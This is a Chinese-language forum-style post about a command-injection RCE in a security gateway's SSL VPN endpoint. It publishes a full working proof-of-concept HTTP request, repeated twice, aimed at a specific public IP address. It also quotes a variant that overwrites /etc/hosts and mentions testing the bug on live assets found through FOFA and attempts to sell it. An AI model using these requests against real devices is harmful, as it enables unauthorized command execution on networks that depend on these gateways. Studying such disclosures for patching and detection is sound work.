关于最近的多平台网关rce
首先这个洞不是图里面山海之关八月18星球里发的那个sslvpn的rce,poc不一样的
最早的出处应该是安全矩阵:http://www.smatrix.org/forum/forum.php?mod=viewthread&tid=5054
在今年八月份
然后seem不知道哪里嫖到poc了跑来给我说有0day让我联系人卖,我就让m3去找了pmf然后人家不收。当时和seem私聊的时候fofa搜资产试了好几个确实能打效果很不错,虽然这是个nday。你要说seem恰烂钱卖nday,有道理,但另一方面这个nday杀伤力确实摆在那里,你说有价值吗,我感觉也有。
然后就是传说的什么这个洞有a卷b卷还是什么c卷的我目测没有,别上当被坑钱。等白盒的代码分析文章出来就清楚了。
poc:
POST /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/某某某.txt|ls HTTP/1.1
Host: 60.167.74.75:4430
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
访问txt能看到rce的回显
首先这个洞不是图里面山海之关八月18星球里发的那个sslvpn的rce,poc不一样的
最早的出处应该是安全矩阵:http://www.smatrix.org/forum/forum.php?mod=viewthread&tid=5054
在今年八月份
然后seem不知道哪里嫖到poc了跑来给我说有0day让我联系人卖,我就让m3去找了pmf然后人家不收。当时和seem私聊的时候fofa搜资产试了好几个确实能打效果很不错,虽然这是个nday。你要说seem恰烂钱卖nday,有道理,但另一方面这个nday杀伤力确实摆在那里,你说有价值吗,我感觉也有。
然后就是传说的什么这个洞有a卷b卷还是什么c卷的我目测没有,别上当被坑钱。等白盒的代码分析文章出来就清楚了。
poc:
POST /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/某某某.txt|ls HTTP/1.1
Host: 60.167.74.75:4430
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
访问txt能看到rce的回显
www.smatrix.org
安恒明御安全网关 sslvpn_RCE POC - 技术转载 安全矩阵
v>GET https://ip:port/sslvpn/sslvpn_client.php?client=logoImg&img=6drcdfs34c1h /tmp || ls |tee/etc/hosts /usr/local/webui/webui/images/basic/login/main_logo21. ... 安恒明御安全网关 sslvpn_RCE POC ,安全矩阵
盲猜又是接受表单数据OGNL表达式解析不严谨,21年表达式注入就各种姿势利用烂了还搁这在控制器里头铁拼接value加代码呢,写个动态调用或者参数化处理includeParams会死吗😅